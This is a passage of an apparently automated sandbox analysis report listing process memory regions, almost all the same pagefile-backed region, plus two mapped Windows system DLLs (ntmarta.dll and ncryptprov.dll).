	              id = 2614
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2615
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2616
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2617
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2618
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2619
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2620
	        start_va = 0x70190000
	          end_va = 0x701b7fff
	     entry_point = 0x70190000
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")

Region:
	              id = 2621
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2622
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2623
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2624
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2625
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2626
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2627
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2628
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2629
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2630
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2631
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2632
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2633
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2634
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2635
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2636
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2637
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2638
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2639
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2640
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2641
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2642
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2643
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2644
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2645
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2646
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2647
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2648
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2649
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2650
	        start_va = 0x6fdc0000
	          end_va = 0x6fe03fff
	     entry_point = 0x6fdc0000
	     region_type = mapped_file
	            name = "ncryptprov.dll"
	        filename = "\\Windows\\SysWOW64\\ncryptprov.dll" (normalized: "c:\\windows\\syswow64\\ncryptprov.dll")

Region:
	              id = 2651
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2652
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2653
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2654
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2655
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2656
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2657
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2658
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2659
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2660
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2661
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2662
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2663
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2664
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2665
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2666
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2667
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2668
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2669
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2670
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2671
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2672
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2673
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2674
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2675
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2676
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2677
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2678
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2679
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2680
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2681
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2682
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2683
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2684
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2685
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2686
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2687
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2688
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2689
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2690
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2691
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2692
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2693
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2694
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2695
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2696
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2697
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2698
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2699
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2700
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2701
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2702
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2703
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2704
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2705
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2706
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2707
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2708
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2709
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2710
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2711
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2712
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2713
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2714
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2715
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2716
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2717
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2718
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2719
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2720
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2721
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2722
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2723
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2724
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2725
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2726
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2727
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2728
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2729
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2730
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2731
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2732
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2733
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2734
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2735
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2736
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2737
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2738
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2739
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2740
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2741
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2742
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2743
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2744
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2745
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2746
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2747
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2748
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2749
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2750
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2751
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2752
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2753
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2754
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2755
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2756
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2757
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2758
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2759
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2760
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2761
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2762
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2763
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2764
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
